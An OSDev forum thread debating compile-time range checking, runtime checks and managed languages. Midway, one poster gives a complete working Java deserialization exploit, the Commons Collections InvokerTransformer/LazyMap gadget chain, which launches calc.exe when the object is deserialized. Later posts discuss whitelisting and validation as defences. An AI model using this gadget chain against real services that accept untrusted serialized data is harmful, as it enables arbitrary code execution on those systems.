Os and implementing good gpu drivers(nvidia)
Re: Os and implementing good gpu drivers(nvidia)
Hi,
For this code:Rusky wrote:Heh, I believe this is the source of both Schol-R-LEA's and my disagreement with your claim of "no runtime checks." Because that is a check performed at runtime, and it is required by the compiler, it's just inserted by the programmer instead. (I do prefer that method though, as with the right annotations in the language it allows the programmer to control exactly where the runtime checks happen.)Brendan wrote:If the programmer does happen to do something like "if(x >= x.max) { return FAILED; }" then this is no different to any branch in any language. It's not a run-time check inserted by the compiler itself.
Code: Select all
value = 0;
while( (c = buffer[i++]) != 0) {
if( (c >= '0') && (c <= '9') ) {
value = value * 16 + c - '0';
} else if( (c >= 'A') && (c <= 'F') ) {
value = value * 16 + c - 'A' + 10;
} else {
return -1;
}
}
return value;
Are these branches normal flow control or are they run-time checks?
What if I wrote this:
Code: Select all
unsigned long long factorial(unsigned char value) {
return value * factorial(value-1);
}
And the compiler complained that "value - 1" may overflow (become negative); and I changed the code to this:
Code: Select all
unsigned long long factorial(unsigned char value) {
if(value <= 1) return 1;
return value * factorial(value-1);
}
Did I add a run-time check or normal flow control?
If you think these are run-time checks (and not normal flow control); then all software has run-time checks and therefore all software is managed. It's absurd.
Cheers,
Brendan
For all things; perfection is, and will always remain, impossible to achieve in practice. However; by striving for perfection we create things that are as perfect as practically possible. Let the pursuit of perfection be our guide.
Re: Os and implementing good gpu drivers(nvidia)
Yeah, it's obvious that there are conditionals that belong to the given algorithm and checks that only shield against programming errors like an index out of bounds.Brendan wrote:Did I add a run-time check or normal flow control?
If you think these are run-time checks (and not normal flow control); then all software has run-time checks and therefore all software is managed. It's absurd.
The latter ones are auto-generated in e.g. Java or D, and I'd also count std::vector::at in C++.
Conflating those doesn't help the discussion, but of course a less proficient programmer could degrade any statically checked system by always just doing something like:
Code: Select all
array[x] // error cannot prove that x < array.length
// less proficient programmer changes this to
if(x >= array.length)
throw IndexOutOfBounds()
array[x] // fine now
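For contrast, here is that same distinction in Java - a minimal sketch (class and variable names invented) in which the first access relies on the bounds check the JVM generates behind every array access, while the second folds the same test into ordinary flow control placed by the programmer:
Code: Select all
public class BoundsDemo {
	public static void main(String[] args) {
		int[] array = { 10, 20, 30 };
		int x = 3; // out of bounds on purpose

		// Auto-generated check: the JVM tests the index on every access.
		try {
			int v = array[x]; // throws ArrayIndexOutOfBoundsException
		} catch (ArrayIndexOutOfBoundsException e) {
			System.out.println("runtime check fired: " + e.getMessage());
		}

		// Explicit flow control: the same test, written by the programmer,
		// placed and handled wherever the algorithm wants it.
		if (x >= 0 && x < array.length) {
			System.out.println(array[x]);
		} else {
			System.out.println("index rejected before the access");
		}
	}
}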
- Schol-R-LEA
- Member
- Posts: 1925
- Joined: Fri Oct 27, 2006 9:42 am
- Location: Athens, GA, USA
Re: Os and implementing good gpu drivers(nvidia)
OK, this gives me some idea of your intentions. From this, I gather your intent is that the compiler flag an error (or at least a warning) on potentially invalid values. This seems reasonable to me, and I had much the same thing in mind (though only for builds with a version status of 'release-candidate' and above). It also tells me that you are differentiating between the compiler inserting runtime checks automatically, and the compiler requiring the programmer to include manually inserted runtime checks.Brendan wrote:For this case; the compiler would see "x = x + 1;" and evaluate the range of the result of the expression on the right hand side (if x ranges from 0 to 999 then x+1 must have a range from 1 to 1000). Then (for assignment) the compiler checks that the left hand side is able to store that range of values, and generates a compile time error because x can only store a value from 0 to 999.
The programmer would have to fix the error. This might mean doing "x = (x + 1) % (x.max + 1)" if they want wrapping, or doing "x = min(x+1, x.max);" if they want saturation, or adding a check immediately before it, or adding a check somewhere else entirely, or increasing the range of values that x can hold, or changing it to "x2 = x + 1;", or ....
If the programmer does happen to do something like "if(x >= x.max) { return FAILED; }" then this is no different to any branch in any language. It's not a run-time check inserted by the compiler itself.
This last part is of interest to me, as I am not sure I see them as being as clear-cut as you seem to be asserting. For example, it would seem (to me) that there is no reason this couldn't be automated, at least partially. For example, let us consider the possibility of allowing the client-programmer to define range types (either as named types or as one-off subtypes of the integer type) in which a specific behavior is defaulted:
Code: Select all
(def Foo-Range
  (constrained-type Integer
    (cond ((< _ -250) (set! _ -250) _)
          ((>= _ 750) (raise-overflow-exception! _))
          (else _))))
(This is just off the top of my head, but sort of what I have in mind; I would probably have a specific ranged-type c'tor that would cover this common case:
Code: Select all
(def Foo-Range
(ranged-type Integer
:underflow #saturate
:overflow (raise-overflow-exception! _)))
or something like it.) Similar things could be done with ranged types in (for example) Ada, though IIRC in that case the default (and only) behavior is to raise a standard exception. Furthermore, using an explicit range could allow the compiler (or library macros, in my case) to automatically optimize the variable's memory footprint (by using a 16-bit value instead of a 64-bit one, for example). Of course, range checking is just one example, but the point is, there are ways in which this can be automated which would still give the client-programmer fine control over the handling of edge cases.
Also, the premise of pre-analyzing all possible paths has the potential of running into a combinatorial explosion. At some point, the compiler would have to simply give up and reject the code, agreed? That may make certain kinds of code impossible to write with such restrictions in place. This is not a very likely scenario, so I don't know if it is worth giving too much weight to it, but it would have to be addressed at least in the documentation and error reporting.
There's another case which would be problematic (well, in most languages, anyway - there are languages where it is possible to programmatically generate types at runtime, but the overhead is quite steep), which is where the range itself is set at runtime. There really would be no clear-cut way to check that ahead of time in a statically-typed language, so the compiler would in your scenario require every access to the value to be explicitly tested. Since this is precisely the scenario we are looking to avoid, it is hard to see how not testing automatically would be of benefit. Again, an unlikely scenario, but something to give consideration to.
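As a minimal Java sketch of that scenario (all names here are invented), when the bound only becomes known at runtime there is nothing for a static checker to verify, so every store has to carry an explicit guard:
Code: Select all
public class RuntimeRange {
	private final int max; // bound decided at runtime, e.g. read from configuration
	private int value;

	public RuntimeRange(int max) {
		this.max = max;
	}

	public void set(int v) {
		// The unavoidable explicit test: no compile-time range is available.
		if (v < 0 || v > max) {
			throw new IllegalArgumentException("out of range: " + v);
		}
		value = v;
	}

	public int get() {
		return value;
	}
}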
I gather, you would consider explicit checks preferable in any of these scenarios, is this correct?
Schol-R-LEA wrote:Note that I have not given the context of this use case - neither whether it is part of a loop condition or simply some arbitrary part of the program logic, nor whether the increment or the range are explicitly defined in the program or not. Context may be relevant to your solution, I will grant, but I want to first consider the general case before moving on to specific cases.
I would say it can affect a good deal more than that. For example, if the value is the index of a definite loop, and the compiler detects that the body of the code had no effect, then the loop itself (including the increment) can be optimized away.Brendan wrote:The context only really affects what the compiler thinks the previous range of values in x could be.
OK, that's not really a fair example, but consider (as an example) a counting loop where the index is not explicitly used for any other purpose; depending on the processor, it may be possible to reverse the increment to a decrement in order to use a simpler exit condition, or replace the loop with non-conditional repetition (e.g., REP MOVSB, which steps RSI and RDI implicitly). Finding such potential optimizations (and knowing when they would make a difference) might not always be feasible, but that's not the point: the point is that context can affect how you compile a particular part of a program.
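As an illustration of the down-counting rewrite (a Java sketch with invented names; the two loops do the same work, but the second exits on a compare against zero, which the decrement often yields for free):
Code: Select all
public class LoopDirection {
	static void doWork() {
		// loop body that never reads the index
	}

	public static void main(String[] args) {
		int n = 1000;
		// Counting up: the exit test compares the index against a separate bound.
		for (int i = 0; i < n; i++) doWork();
		// Counting down: the exit test is a compare against zero.
		for (int i = n; i != 0; i--) doWork();
	}
}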
Excellent, this gives us all a lot better understanding of your intentions and motivations, I think.Brendan wrote:Basically it comes down to a design choice. A compiler may:
- guarantee there are no false positives (e.g. overflows) at compile time; which makes it impossible to avoid false negatives (e.g. "nuisance" errors) at compile time, or
- guarantee there are no false negatives (e.g. "nuisance" errors) at compile time; which makes it impossible to avoid false positives (e.g. overflows) at compile time
The first option is what I'm planning. It's harder to write the compiler and makes things a little more annoying for programmers when they write code.
Rev. First Speaker Schol-R-LEA;2 LCF ELF JAM POEE KoR KCO PPWMTF
Ordo OS Project
Lisp programmers tend to seem very odd to outsiders, just like anyone else who has had a religious experience they can't quite explain to others.
Re: Os and implementing good gpu drivers(nvidia)
This is precisely my point - they are (or should be) the same thing. Like I said, "it allows the programmer to control exactly where the runtime checks happen," and that includes folding them into other control flow that may already be necessary.Brendan wrote:If you think these are run-time checks (and not normal flow control); then all software has run-time checks
Yes, concluding that everything is "managed" because it has non-compiler-enforced runtime checks often folded into regular control flow does sound an awful lot like something embryo would say.Brendan wrote:and therefore all software is managed. It's absurd.
Re: Os and implementing good gpu drivers(nvidia)
Your insistence has paid off. I finally downloaded the code from the Git repository and managed to run it in a much simpler form (to understand it clearly).Octocontrabass wrote:How does $1000 USD sound? Please read the next section carefully before agreeing.
Yes. It works. I was wrong.
Here is the code. None of the article author's classes are needed. But to compile it you need the JDK rather than just the JRE. And Commons Collections, of course. There will be an exception after calc.exe is run, but that's not important for the problem.
Code: Select all
// Requires Apache Commons Collections 3.x on the classpath; compile with the JDK.
import java.io.*;
import java.lang.reflect.*;
import java.util.*;
import org.apache.commons.collections.*;
import org.apache.commons.collections.functors.*;
import org.apache.commons.collections.map.LazyMap;

public class Deser {
	public static void main(String[] args) throws Exception {
		// Reflective call chain: Runtime.class -> getRuntime() -> exec("calc.exe").
		Transformer[] transformers = new Transformer[] {
			new ConstantTransformer(Runtime.class),
			new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }),
			new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }),
			new InvokerTransformer("exec", new Class[] { String.class }, new String[] { "calc.exe" }),
			new ConstantTransformer(1) };
		Transformer transformerChain = new ChainedTransformer(transformers);
		// Map that runs the chain whenever a missing key is looked up.
		Map<?,?> lazyMap = LazyMap.decorate(new HashMap<Object,Object>(), transformerChain);
		// AnnotationInvocationHandler is package-private: grab its constructor reflectively.
		Constructor<?> c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructors()[0];
		c.setAccessible(true);
		// Proxy whose Map methods hit the LazyMap, wrapped in a second handler
		// so that merely deserializing the handler touches the map.
		InvocationHandler ih1 = (InvocationHandler) c.newInstance(Override.class, lazyMap);
		Class<?>[] allIfaces = new Class[] { Map.class };
		Map<?,?> mapProxy = Map.class.cast(Proxy.newProxyInstance(Map.class.getClassLoader(), allIfaces, ih1));
		InvocationHandler ih = (InvocationHandler) c.newInstance(Override.class, mapProxy);
		// Write the payload out...
		ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("d:/temp/ser.bin"));
		oos.writeObject(ih);
		oos.close();
		// ...and reading it back in is enough to launch calc.exe.
		ObjectInputStream ois = new ObjectInputStream(new FileInputStream("d:/temp/ser.bin"));
		Object after = ois.readObject();
		ois.close();
	}
}
So, just stop using serialized objects from untrusted sources.
My previous account (embryo) was accidentally deleted, so I have no choice but to use something new. But maybe it was a good lesson about software reliability
Re: Os and implementing good gpu drivers(nvidia)
Or fix deserialization so you can use it for untrusted communication instead of other, more error-prone methods. Or isn't that what managed languages are supposed to do for you?embryo2 wrote:So, just stop using serialized objects from untrusted sources.
Re: Os and implementing good gpu drivers(nvidia)
Hi,
I don't just have ranged types, I only have ranged types.Schol-R-LEA wrote:OK, this gives me some idea of your intentions. From this, I gather your intent is that the compiler flag an error (or at least a warning) on potentially invalid values. This seems reasonable to me, and I had much the same thing in mind (though only for builds with a version status of 'release-candidate' and above). It also tells me that you are differentiating between the compiler inserting runtime checks automatically, and the compiler requiring the programmer to include manually inserted runtime checks.Brendan wrote:For this case; the compiler would see "x = x + 1;" and evaluate the range of the result of the expression on the right hand side (if x ranges from 0 to 999 then x+1 must have a range from 1 to 1000). Then (for assignment) the compiler checks that the left hand side is able to store that range of values, and generates a compile time error because x can only store a value from 0 to 999.
The programmer would have to fix the error. This might mean doing "x = (x + 1) % (x.max + 1)" if they want wrapping, or doing "x = min(x+1, x.max);" if they want saturation, or adding a check immediately before it, or adding a check somewhere else entirely, or increasing the range of values that x can hold, or changing it to "x2 = x + 1;", or ....
If the programmer does happen to do something like "if(x >= x.max) { return FAILED; }" then this is no different to any branch in any language. It's not a run-time check inserted by the compiler itself.
This last part is of interest to me, as I am not sure I see them as being as clear-cut as you seem to be asserting. For example, it would seem (to me) that there is no reason this couldn't be automated, at least partially. For example, let us consider the possibility of allowing the client-programmer to define range types (either as named types or as one-off subtypes of the integer type) in which a specific behavior is defaulted:Code: Select all
(def Foo-Range (constrained-type Integer (cond ((< _ -250) (set! _ -250) _) ((>= _ 750) (raise-overflow-exception! _)) (else _))))
(This is just off the top of my head, but sort of what I have in mind; I would probably have a specific ranged-type c'tor that would cover this common case:or something like it.) Similar things could be done with ranged types in (for example) Ada, though IIRC in that case the default (and only) behavior is to raise a standard exception. Furthermore, using an explicit range could allow the compiler (or library macros, in my case) to automatically optimize the variable's memory footprint (by using a 16-bit value instead of 64-bit one, for example). Of course, range checking is just one example, but the point is, there are ways in which this can be automated which would still give the client-programmer fine control over the handling of edge cases.Code: Select all
(def Foo-Range (ranged-type Integer :underflow #saturate :overflow (raise-overflow-exception! _)))
For creating integers it's like "range 0 to 255 myInteger", but (for convenience) the compiler also lets you specify a range by the number of bits (e.g. "s7" is a synonym for "range -64 to 63", and "u12" is a synonym for "range 0 to 4095").
For creating floating point variables it's similar but different because there's both precision and range. The precision is specified in bits and the range is like it is for integers - e.g. "f24 range 0 to 1 myFloaty". It's also possible to set the range by specifying the exponent size in bits, so "f24e8" is equivalent to a single precision (32-bit) float.
In general this has nothing to do with how much space variables consume and programmers shouldn't know or care about storage. For example if you have an integer "range 100000000 to 100000255 foo" then the compiler can store it in 8 bits or anything else it feels like.
For structures, the compiler is free to do anything it wants. For example, if you have this:
Code: Select all
struct {
range 100000000 to 100000255 foo
u32 bar
range 1 to 7 dayOfWeek
range 1 to 31 day
range 1 to 12 month
}
Then the compiler might use 8 bits for "foo"; then decide to pack "dayOfWeek", "day" and "month" into a bitfield; and then (for alignment purposes) re-order the fields so you end up with this:
Code: Select all
struct {
u32 bar
u16 dayOfWeek : 3
u16 day : 5
u16 month : 4
u8 foo
}
Of course the language doesn't support bitfields, as there's no real reason to bother with them.
For cases where the exact layout in memory matters (e.g. for file formats and messaging protocols in normal processes, and for things like page tables in kernels and memory-mapped IO in device drivers) there's "rigid structures". For these the compiler has to follow a set of strict rules - no padding for alignment (other than rounding to the nearest whole byte), no field re-ordering, everything little-endian (even on big-endian machines), no tricks to reduce sizes (that "range 100000000 to 100000255 foo" variable would be 32 bits), etc.
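In today's languages that rigidity has to be spelled out by hand. As a sketch (not Brendan's language; class and method names invented), the struct above serialized to the fixed little-endian layout using a Java ByteBuffer:
Code: Select all
import java.nio.ByteBuffer;
import java.nio.ByteOrder;

public class RigidStruct {
	// Fixed wire layout: no reordering, no padding beyond whole bytes,
	// always little-endian regardless of the host CPU.
	public static byte[] encode(long foo, long bar, int dayOfWeek, int day, int month) {
		ByteBuffer buf = ByteBuffer.allocate(4 + 4 + 1 + 1 + 1)
		                           .order(ByteOrder.LITTLE_ENDIAN);
		buf.putInt((int) foo);     // "range 100000000 to 100000255" still occupies 32 bits
		buf.putInt((int) bar);     // u32
		buf.put((byte) dayOfWeek); // range 1 to 7, rounded up to a whole byte
		buf.put((byte) day);       // range 1 to 31
		buf.put((byte) month);     // range 1 to 12
		return buf.array();
	}
}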
No.Schol-R-LEA wrote:Also, the premise of pre-analyzing all possible paths has the potential of running into a combinatorial explosion. At some point, the compiler would have to simply give up and reject the code, agreed? That may make certain kinds of code impossible to write with such restrictions in place. This is not a very likely scenario, so I don't know if it is worth giving too much weight to it, but it would have to be addressed at least in the documentation and error reporting.
A function's signature is a contract. If you write "range 1 to 9 myFunction(range -100 to 300 y)" then the compiler checks that the function is capable of handling all possible values of y from -100 to 300 correctly. If the function is called, the compiler only has to check that the caller complies with the contract (the caller provides a value from -100 to 300). This means that individual functions can be checked in isolation, and checked in any order (and checked in parallel, possibly by multiple computers on a LAN).
Also note that for local variables the overflow checking can work in reverse. Normally for assignments the compiler ensures that the left hand side variable can handle the range of results from the right hand expression and complains if it doesn't. However, if you say that a local variable has the "auto" type then the compiler initially assumes the variable's range is from 0 to 0, and instead of complaining if there's an overflow it just increases the variable's range.
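As an illustration only (a toy Java sketch with invented names, not the actual compiler), the interval arithmetic such a checker might run at compile time: expression ranges combine endpoint-wise, assignment into a fixed range is rejected when the result may not fit, and an "auto" variable widens instead of failing:
Code: Select all
public class Range {
	long min, max;

	Range(long min, long max) {
		this.min = min;
		this.max = max;
	}

	// Range of "x + y": add the endpoints.
	Range plus(Range o) {
		return new Range(min + o.min, max + o.max);
	}

	// Assignment into a fixed-range variable: reject if the result may not fit.
	void assignFrom(Range rhs) {
		if (rhs.min < min || rhs.max > max)
			throw new IllegalStateException("compile-time error: possible overflow");
	}

	// Assignment into an "auto" variable: widen the range instead of rejecting.
	void widenFrom(Range rhs) {
		min = Math.min(min, rhs.min);
		max = Math.max(max, rhs.max);
	}

	public static void main(String[] args) {
		Range x = new Range(0, 999);
		Range xPlus1 = x.plus(new Range(1, 1)); // 1..1000
		Range auto = new Range(0, 0);
		auto.widenFrom(xPlus1);                 // auto becomes 0..1000
		x.assignFrom(xPlus1);                   // rejected: 1000 > 999
	}
}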
You'd have to choose a "max. size" type and the compiler will only ensure that all your code handles the range of the max. size type correctly. Anything beyond that (e.g. if you want to limit values to a sub-range at run-time, or only want to store prime numbers, or only odd numbers, or whatever else) is "domain logic" (your problem) and not "correctness" (compiler's problem).Schol-R-LEA wrote:There's another case which would be problematic (well, in most languages, anyway - there are languages where it is possible to programmatically generate types at runtime, but the overhead is quite steep), which is where the range itself is set at runtime. There really would be no clear-cut way to check that ahead of time in a statically-typed language, so the compiler would in your scenario require every access to the value to be explicitly tested. Since this is precisely the scenario we are looking to avoid, it is hard to see how not testing automatically would be of benefit. Again, an unlikely scenario, but something to give consideration to.
I gather, you would consider explicit checks preferable in any of these scenarios, is this correct?
Things like syntax checks, grammar/semantic checks, type checks, and overflow and precision checks happen first. Optimisations only happen after checks are done.Schol-R-LEA wrote:I would say it can affect a good deal more than that. For example, if the value is the index of a definite loop, and the compiler detects that the body of the code had no effect, then the loop itself (including the increment) can be optimized away.Brendan wrote:The context only really affects what the compiler thinks the previous range of values in x could be.Schol-R-LEA wrote:Note that I have not given the context of this use case - neither whether it is part of a loop condition or simply some arbitrary part of the program logic, nor whether the increment or the range are explicitly defined in the program or not. Context may be relevant to your solution, I will grant, but I want to first consider the general case before moving on to specific cases.
OK, that's not really a fair example, but consider (as an example) a counting loop where the index is not explicitly used for any other purpose; depending on the processor, it may be possible to reverse the increment to a decrement in order to use a simpler exit condition, or replace the loop with non-conditional repetition (e.g., REP MOVSB, which steps RSI and RDI implicitly). Finding such potential optimizations (and knowing when they would make a difference) might not always be feasible, but that's not the point: the point is that context can affect how you compile a particular part of a program.
For this aspect of it, yes.Schol-R-LEA wrote:Excellent, this gives us all a lot better understanding of your intentions and motivations, I think.Brendan wrote:Basically it comes down to a design choice. A compiler may:
- guarantee there are no false positives (e.g. overflows) at compile time; which makes it impossible to avoid false negatives (e.g. "nuisance" errors) at compile time, or
- guarantee there are no false negatives (e.g. "nuisance" errors) at compile time; which makes it impossible to avoid false positives (e.g. overflows) at compile time
The first option is what I'm planning. It's harder to write the compiler and makes things a little more annoying for programmers when they write code.
Cheers,
Brendan
For all things; perfection is, and will always remain, impossible to achieve in practice. However; by striving for perfection we create things that are as perfect as practically possible. Let the pursuit of perfection be our guide.
Re: Os and implementing good gpu drivers(nvidia)
Why do you think untrusted communication is better than other methods?Rusky wrote:Or fix deserialization so you can use it for untrusted communication instead of other, more error-prone methods.
More security? Yes. Can developers of managed environments make security-related bugs? Yes. But with the unmanaged approach the security is compromised even more. If a program runs unbound then there's no way to change anything. And it is still impossible to guarantee a program's safety before it hits its users.Rusky wrote:Or isn't that what managed languages are supposed to do for you?
My previous account (embryo) was accidentally deleted, so I have no choice but to use something new. But maybe it was a good lesson about software reliability
- Combuster
- Member
- Posts: 9301
- Joined: Wed Oct 18, 2006 3:45 am
- Libera.chat IRC: [com]buster
- Location: On the balcony, where I can actually keep 1½m distance
Re: Os and implementing good gpu drivers(nvidia)
Requiring authentication only lowers the amount of privileges escalated. If you get hold of an account that can't normally do much, you can still exploit this for full administrator privileges.Rusky wrote:Or fix deserialization so you can use it for untrusted communication instead of other, more error-prone methods. Or isn't that what managed languages are supposed to do for you?embryo2 wrote:So, just stop using serialized objects from untrusted sources.
I don't consider authentication a fix. After all, chances are there's some employee who neglected to change his password from "hello", or there's a simple sign-up form that gives you "zero" privileges.
- Schol-R-LEA
- Member
- Posts: 1925
- Joined: Fri Oct 27, 2006 9:42 am
- Location: Athens, GA, USA
Re: Os and implementing good gpu drivers(nvidia)
While I agree that it isn't a fix, some sort of authentication or vetting will probably have to be part of any 'solution' that comes up, at least in the immediate term, and it does at least raise the barrier to attack a small amount. Whether it raises it sufficiently to justify the added complexity, and how much said complexity itself changes the window of vulnerability, is something that would have to be determined as specific approaches get proposed and disposed. Security is a treatment, not a remedy.Combuster wrote:Requiring authentication only lowers the amount of privileges escalated. If you get hold of an account that can't normally do much, you can still exploit this for full administrator privileges.Rusky wrote:Or fix deserialization so you can use it for untrusted communication instead of other, more error-prone methods. Or isn't that what managed languages are supposed to do for you?embryo2 wrote:So, just stop using serialized objects from untrusted sources.
I don't consider authentication a fix. After all, chances are there's some employee who neglected to change his password from "hello", or there's a simple sign-up form that gives you "zero" privileges.
What is really needed, though, are better mechanisms for continuous review of existing security resolutions, preferably one that is reflective enough that exploits of the review itself would be significantly difficult. Of course, you would need to change that procedure itself over time to make sure no new unforeseen exploits arise. Security is a process, etc.
Rev. First Speaker Schol-R-LEA;2 LCF ELF JAM POEE KoR KCO PPWMTF
Ordo OS Project
Lisp programmers tend to seem very odd to outsiders, just like anyone else who has had a religious experience they can't quite explain to others.
Ordo OS Project
Lisp programmers tend to seem very odd to outsiders, just like anyone else who has had a religious experience they can't quite explain to others.
Re: Os and implementing good gpu drivers(nvidia)
Not sure who you were replying to, but by "fix deserialization" I mean something more like restricting it to a whitelist of classes, or restricting it to plain old data types if that's an option in the language. You should be able to easily read data from the network without worrying about it executing arbitrary code or allocating too much memory or hanging your program.
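For the whitelist variant, Java's stream API already has the hook: an ObjectInputStream subclass can veto every incoming class in resolveClass before it is ever instantiated. A minimal sketch (the class name and whitelist entries are invented):
Code: Select all
import java.io.*;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

public class WhitelistObjectInputStream extends ObjectInputStream {
	// Example whitelist: plain data classes only.
	private static final Set<String> ALLOWED = new HashSet<String>(
			Arrays.asList("java.util.HashMap", "java.lang.Integer"));

	public WhitelistObjectInputStream(InputStream in) throws IOException {
		super(in);
	}

	@Override
	protected Class<?> resolveClass(ObjectStreamClass desc)
			throws IOException, ClassNotFoundException {
		// Reject the class before it gets any chance to run code.
		if (!ALLOWED.contains(desc.getName())) {
			throw new InvalidClassException("Unauthorized class: " + desc.getName());
		}
		return super.resolveClass(desc);
	}
}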
Re: Os and implementing good gpu drivers(nvidia)
It's called validation. In the case of a password there's also some kind of validation involved. So, the trusted source is the source of validated data.Rusky wrote:Not sure who you were replying to, but by "fix deserialization" I mean something more like restricting it to a whitelist of classes, or restricting it to plain old data types if that's an option in the language. You should be able to easily read data from the network without worrying about it executing arbitrary code or allocating too much memory or hanging your program.
By the way, there are a lot of XML parsers used without serious validation. So, in any language it is possible to invoke something on the server side if the parser is eager to invoke something data-driven.
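For the XML case, the standard hardening with the stock JAXP API is to refuse DTDs and external entities before parsing anything untrusted (the feature URIs are the documented Xerces ones; the class name is invented):
Code: Select all
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;

public class SafeXml {
	// Returns a parser that refuses DTDs and external entities, so
	// crafted XML has nothing data-driven to hook into.
	public static DocumentBuilder hardenedParser() throws ParserConfigurationException {
		DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
		dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
		dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
		dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
		dbf.setXIncludeAware(false);
		dbf.setExpandEntityReferences(false);
		return dbf.newDocumentBuilder();
	}
}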
My previous account (embryo) was accidentally deleted, so I have no choice but to use something new. But maybe it was a good lesson about software reliability
- Combuster
- Member
- Posts: 9301
- Joined: Wed Oct 18, 2006 3:45 am
- Libera.chat IRC: [com]buster
- Location: On the balcony, where I can actually keep 1½m distance
Re: Os and implementing good gpu drivers(nvidia)
I'd vote to ban deserialisation side-effects altogether. If you do need them it's easy to call a method on the root deserialised object and propagate from there.Rusky wrote:Not sure who you were replying to, but by "fix deserialization" I mean something more like restricting it to a whitelist of classes, or restricting it to plain old data types if that's an option in the language. You should be able to easily read data from the network without worrying about it executing arbitrary code or allocating too much memory or hanging your program.
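As a sketch of that discipline in Java (type and field names invented): the serialized class is plain data with no deserialization hooks, and any side effects wait for an explicit call on the root object after it has been read and validated:
Code: Select all
import java.io.Serializable;

public class JobRequest implements Serializable {
	private static final long serialVersionUID = 1L;

	// Plain data only: no readObject hook, nothing runs during deserialization.
	public String jobName;
	public int priority;

	// Side effects happen only when the receiver explicitly asks for them.
	public void activate() {
		if (priority < 0 || priority > 9) {
			throw new IllegalArgumentException("bad priority: " + priority);
		}
		System.out.println("starting " + jobName);
	}
}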
Re: Os and implementing good gpu drivers(nvidia)
It's not easy. The root is not responsible for the flaw in the case of the hack being discussed. The way it works is complex. There's actually the LazyMap class that connects fields with actions. And it is invoked during the very specific action of annotation deserialization. And the annotation is not the root class. And all the transformers from Commons Collections are not guilty. It's the LazyMap.Combuster wrote:I'd vote to ban deserialisation side-effects altogether. If you do need them it's easy to call a method on the root deserialised object and propagate from there.
Because of such complexity there's just no way around very thorough validation. In the case of XML, JSON or even HTTP or RMI or whatever, there are also deserializers. What if some of them invoke something like LazyMap in the process? Validation allows us to limit the incoming threat; otherwise we need to review all the parsing-related code in every language.
My previous account (embryo) was accidentally deleted, so I have no choice but to use something new. But maybe it was a good lesson about software reliability